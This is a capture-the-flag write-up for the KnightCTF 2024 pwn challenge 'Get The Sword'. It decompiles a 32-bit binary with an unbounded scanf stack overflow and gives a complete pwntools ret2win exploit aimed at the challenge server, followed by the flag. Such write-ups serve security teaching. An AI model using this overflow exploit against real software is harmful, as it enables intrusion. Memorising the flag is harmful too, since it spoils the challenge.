> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/ctf/knightctf2024/pwn/get-the-sword.md).

# &#x20;Get The Sword

{% file src="/files/oKSea2cMamXIuZvkUlWk" %}

## <mark style="color:red;">Challenge Description :</mark>&#x20;

<div align="left"><figure><img src="/files/RrRHunn1l30Fban5807D" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Basic Binary Enumeration :</mark>&#x20;

we can see that the binary is 32 bit not stripped that means that the functions names are not obfuscated and all the protections are off

<div align="left"><figure><img src="/files/gwtfTbyACTWrh6yeZWSk" alt=""><figcaption></figcaption></figure></div>

let's open the binary in ghidra to analyze it and find potential vulnerabilities

we have 4 functions

```c
undefined4 main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)

{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)

{
  undefined local_20 [24];
  
  printf("What do you want ? ?: ");
  fflush(stdout);
  __isoc99_scanf(&%s,local_20); // BOF vulnerability
  printf("You want, %s\n",local_20);
  return;
}

// win function
void getSword(void)

{
  system("cat flag.txt");
  fflush(stdout);
  return;
}
```

the function intro is vulnerable since it reads from the user without checking the size of the data received.

### <mark style="color:blue;">Offset to EIP :</mark>&#x20;

we can use gdb to find the offset and we can also use ghidra.

in ghidra we can see that the offset to reach the EIP is 0x20 which 32

<div align="left"><figure><img src="/files/Yh2QntW21aYsd11A0qfs" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Exploit :</mark>&#x20;

```python
from pwn import *

# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e #ret gadget (ropper --file=ret2win --search="ret") 
payload = flat(
	offset * b'A',
	elf.functions.getSword
)

io.sendlineafter(b':', payload)

io.interactive()
```

<div align="left"><figure><img src="/files/1DSChIpnLRnSLZngk57u" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Flag :</mark>&#x20;

```
KCTF{so_you_g0t_the_sw0rd}
```
